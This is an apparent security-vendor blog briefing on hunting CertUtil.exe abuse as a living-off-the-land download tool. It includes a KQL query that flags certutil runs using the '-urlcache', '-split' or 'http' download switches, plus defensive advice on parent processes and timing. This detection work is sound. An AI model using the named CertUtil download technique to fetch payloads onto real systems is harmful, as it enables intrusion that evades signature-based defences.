Microsoft Defender XDR • DeviceProcessEvents • Living Off The Land Binaries

The CertUtil Command Downloaded Something At 2:17AM

The executable was signed by Microsoft.

It was already present on every Windows workstation.

No malware had been dropped yet. No exploit had triggered. No antivirus alert had fired.

At 2:17AM, CertUtil.exe downloaded a file from the internet.

That was the moment the investigation began.

Discuss your environment Back to briefings

Agent Foskett investigation into suspicious CertUtil downloads using Microsoft Defender XDR and KQL

Briefing summary

A trusted Microsoft utility downloaded content from an external host during the early hours of the morning. Defender telemetry revealed the command line, parent process and destination URL that explained what was really happening.

Microsoft signed binary

Download occurred after hours

DeviceProcessEvents revealed the activity

What happened

The process did not look unusual at first. That was exactly why it needed a closer look.

The process looked legitimate CertUtil.exe is a Microsoft utility commonly used for certificate management and file encoding operations.

The timing was suspicious The command executed outside normal business hours and initiated an outbound download from an external location.

The parent process mattered The download was launched from an unexpected parent process, changing the investigation from routine utility usage to suspicious execution.

The KQL that changed everything

The evidence lived in Microsoft Defender XDR. The hunt started by finding CertUtil executions that included download-related switches or external URLs.

DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName =~ "certutil.exe"
| where ProcessCommandLine contains "-urlcache"
    or ProcessCommandLine contains "-split"
    or ProcessCommandLine contains "http"
| project
    TimeGenerated, DeviceName, AccountName, FileName,
    ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA1
| order by TimeGenerated desc

The download was intentional The command line clearly showed CertUtil being used to retrieve content from an external source.

No custom malware required Attackers can abuse built-in Windows tools because they already exist on the device and often appear trusted at first glance.

The command line contained the evidence The URL, output filename, execution switches and parent process created the timeline that explained the event.

Agent Foskett moment

Everyone focused on the file. Nobody looked at how it arrived.

The binary was trusted Microsoft signed it. It existed on the workstation already. Nothing about the filename alone looked unusual.

The behaviour was not trusted Legitimate tools can still be used for malicious purposes.

This is where strong endpoint security visibility matters.

The process tree told the story Once the parent process and command line were reviewed, the CertUtil execution was no longer just a utility event. It became evidence.

What it was not It was not automatically safe because it was signed by Microsoft. It was not harmless because the file name looked normal.

What it actually was A built-in Windows utility being used to download content. The action, timing and parent process made the event suspicious.

Why it matters The downloaded payload may only be chapter two. The CertUtil command can be the first clear sign that the intrusion timeline has already started.

What most environments miss

Living-off-the-land activity is easy to overlook when defenders only search for unknown executables.

Living-off-the-land attacks Modern attackers often abuse trusted operating system components instead of bringing obvious malware with them.

Command lines matter The executable name alone rarely tells the whole story. ProcessCommandLine often contains the evidence defenders need.

Context beats signatures Parent process, user account, device history, network destination and execution timing can reveal more than a traditional signature.

Related investigations

The Child Process Shouldn't Have Existed Unexpected child process activity can reveal the moment a trusted application begins behaving like part of an attack chain. Read more →

The PowerShell Command Was Base64 Encoded Encoded PowerShell can hide intent until the command line is decoded and placed into the wider process timeline. Read more →

The Process Tree Told The Real Story Process trees often explain what alerts miss by showing what started, what followed and which parent process mattered. Read more →

The Process Was Signed By Microsoft A signed Microsoft process can still be part of suspicious activity when behaviour and context do not match normal use. Read more →

The Device Was Talking To Something It Shouldn't Network activity can confirm whether a suspicious command reached out to infrastructure that does not belong in the environment. Read more →

KQL Threat Hunting Guide Build practical Microsoft Defender XDR and Sentinel investigations across identity, endpoint, email and cloud signals. Read more →

Final thought

Attackers do not always need malware. Sometimes they simply borrow the tools that Windows already provides.

At GEMXIT We help organisations investigate Microsoft Defender XDR endpoint telemetry, suspicious process execution, command-line evidence and living-off-the-land activity across Microsoft 365 environments. If you want to understand how this applies to your environment, see our Cyber Security services.

Agent Foskett mindset Do not just ask whether the executable is trusted. Ask who launched it, what command line was used, where it connected and what happened next.

CertUtil.exe is not automatically malicious. The command line is where the story begins. Explore related investigations including The Child Process Shouldn't Have Existed, The Process Tree Told The Real Story, and the Base64 PowerShell Investigation.

Develop IT. Protect IT. GEMXIT PTY LTD | GEMXIT UK LTD